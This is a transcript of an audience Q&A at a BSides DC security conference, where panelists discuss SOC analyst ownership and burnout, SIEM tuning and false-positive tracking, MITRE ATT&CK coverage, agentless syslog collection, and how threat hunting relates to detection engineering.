100%, yes. So yeah, I build my playbooks with my junior analysts, the ones doing the day-to-day, because the senior analysts are typically putting out fires or in meetings with leadership. When I build stuff in the SOAR, I typically run it through the junior analysts first, then I have the senior analysts take a look, and then we vet it, build it, and implement it into production. So there's an interesting thought process: how many people here work in a SOC as an analyst in some way, shape, or form? A decent number. Of those, how many people feel like they have a direct say in the work that they do and what work they do? I would hope everyone, but that's often not the case, and I only saw about half the hands. So either a lot of people are shy, or people don't feel that way. If you don't feel like you have direct impact on what you do, are you happy there, and do you want to stay there? I got some maybes. So that's the thing. If you don't give the analysts some ownership over what they do, and trust me, as a guy who runs SOCs, most SOC analysts don't get a say in what they do, at least a lot of the ones that I've been
around, and it's awful. Burnout is high, they quit really quickly, and they get jaded about the whole industry. It's ridiculous, it's awful, and a lot of it is because they have no say, which means they don't grow, they don't move forward. Anyway, completely different soapbox. Yes, you had AI and machine learning up there. If you're not retaining data for long periods of time, is it even worth tackling that as a use case? You know, if you only have 30 days' worth of logs... the more data you have, the more likely the use cases you're building are actually going to match what you're looking for. So is it even worth tackling if you're only retaining small amounts of data? Yes, because you can summarize that data. For AI and ML scenarios you shouldn't be running against everything; scope is very important in this world and the work that we do. So you run it every day, or every thirty days: run the analytic on the data, store the analytic result because that's much smaller, then 30 days later store that analytic again, and you can compare the analytics. So there is value there. It's more complicated, but there's value there. Hi, so I'm auditing a SIEM right now for my organization, and
we've never had one before, so everyone's just like, yeah, a SIEM, I've heard of that, go for it, that'll be adorable. You know, kind of like when you're baking a cake with your kid and you're like, here, you just do this part right there. So I've got data coming in, and what I'm noticing is that certain things at the NOC level are being categorized wrong. Like, regular ADFS logins are being considered threats, so it's messing up my SIEM data. It's like, why do we have 10,000 threats in an hour? Oh, everyone just logged in. So once I weed through that to figure out what's actually a threat and what's not, how long do you think I should look at the data to build my baseline before I start putting in anomaly detection? Well, one thing: tuning never ends, right? Tuning never ends. If someone tells you otherwise, they're lying, they're wrong. But no, like I said, you have something that needs to be tuned out of your SIEM, something that shouldn't be an alert unless there's something really wrong in that organization, so you tune that stuff out. Either way, you've done your job and you found it, so good on you. I just have to say, as we go through this, this crowd at BSides DC is one of the best crowds
I've ever had at a conference, ever. Yeah, it's fantastic, I will agree. Good questions. Well, so I have a question for you. I like what you said, that our tuning never ends, but where does the tuning begin? You get a SIEM and you have alerts and things coming in from servers, and you ask, you know, the various server operators what is important, and they don't know. So where do we begin to start tuning the SIEM to make it actually useful for whatever's coming in? Well, you need to track your false positives. I think something that we did was track all our false positives. Once things are vetted and analyzed, we see, okay, we have a typical analytic, and let's say 80% of its hits are false positives. So maybe we start looking at that analytic and tune some of that noise out, because you don't want to give the analysts busywork. Like Shaun alluded to earlier, alert fatigue will ruin your SOC. So you can definitely do it by loudest, but I'm going to present one other possibility here, one other approach: what's your industry, and what's the threat landscape of that industry? If you look at industry verticals and you understand who might attack you, how they might attack you, and what data is important to you, your crown jewels, start there. Start with what matters to you most. I've failed implementing that many, many times, and I think what I've learned from it was utilizing the Pareto principle. So even if the company doesn't really know what's going on, you could start with your Active Directory domain admins and then work from there and scale out, as opposed to spending millions and millions of dollars paying Ernst & Young, well, I won't say their names, to do some of the things that are low-hanging fruit. But I had a question: are there comprehensive resources that map to frameworks that are utilized, like the
MITRE framework, for data sources and things like that? And then, what are some trusted, reliable ways to send data without using agents? Is there an alternative? So I can cover a little bit of the first part, and this is kind of fun for me, because we talk about MITRE and it's great, and I use it and we're mapping to it, but I can also tell you that, how do I want to say it, oftentimes you need way more than one detection per technique. I'll put it that way. A lot of people heat-map out MITRE and it'll be like, oh, I've got 150 detections, I've got MITRE covered, I'm good to go. I've got like 15 different ones just for Valid Accounts that look for different kinds of stuff. I've always been a little bit of the camp that detection building is a very custom thing for your environment and should be treated as such, so I use very little out of the box from that perspective. I'll read about something, maybe I'll see something posted somewhere, and I'll take that and adjust it specifically for my environment before anything goes live. Otherwise you end up at that point where things are flying off the chain because somebody turned on 150 out-of-the-box rules and didn't do anything else with them. For your second question, about getting this data without agents: obviously we can use syslog, because there are devices on a network that we can't put agents on anyway. So we're utilizing syslog, we're pointing it at a syslog server, preferably a small cluster so nothing goes down. And there are some tools, I can't think of any off the top of my head right now, but there are tools that can forward without an agent, and you can ingest it the same way into your SIEM. Oh yeah. So, I have kind of a two-fold question, may not be
related, but it's about new signatures, with regard to the fact that you've got, you know, indicators that are obviously accumulating. So the first question is, are there best practices for tuning? I've got organizations that are just accumulating and storing and never deleting, obviously. And then the second question is, at what point do you pivot to kind of a hunt model rather than just alerting on everything? Okay, so the first question is about tuning, and I think I can probably answer this well. The best practice for tuning is general involvement of the teams who are handling it throughout most of it. As stuff comes in and gets investigated, whether there's multiple teams working or one team, it's live and in real time. So you're doing live, real-time investigation, and then clicking a button and sending it up for tuning, or, if you're automating, clicking a button and tuning it without having to send it to somebody else. The second part, and this was quite literally my topic in the last talk, is the shiny-light syndrome. Hunting has extreme value in a lot of ways. Hunting is a very valuable service, because you're going and looking at thousands upon thousands of low-fidelity indicators for a specific thing if you're doing it hypothesis-based, which is what a lot of people are doing: I think there might be web shells, how can I go find web shells, let me just look for web shells. The problem is you can't have just that, because if you do, hey, maybe in January I look at web shells, and I'm not going to get back to web shells until next year. What happened in between? Did we build any detections for those web shells? No. Oh well, hey, we're back to hunting and we found a whole bunch of web shells from seven months ago, oh, and a whole bunch of data was exfiltrated too. Great. So hunting is an add-on that you should use to strengthen your other programs
look for gaps, and help refine things in a lot of ways, at least in my mind. With regard to the tuning question, I do agree with you wholly about the use case, and I can't evangelize it enough: you tune before you have to tune when you develop proper use cases. If you developed the use case to ingest your intel feed but, while you were developing it, didn't talk about having to weed out those intel indicators after a certain number of days, then you're setting yourself up to have to tune them afterwards. So if you develop the right use cases, you're tuning before you even have to. And sometimes you don't necessarily see the data, so you don't know how you need to tune it. But when we institute a new rule, our policy doesn't send it right to an alert for my team; it goes somewhere else for general review, normalization, and tuning before it ever goes live. Yeah, especially using indicators in a SOAR platform, I need to see that data before I automate on that data. I'm not going to make a guess and then automate; that's going to lead to failure every time. By the way, I just checked, are we at time or do we have time for more questions? We're at time.
Thank you, everybody. [Applause]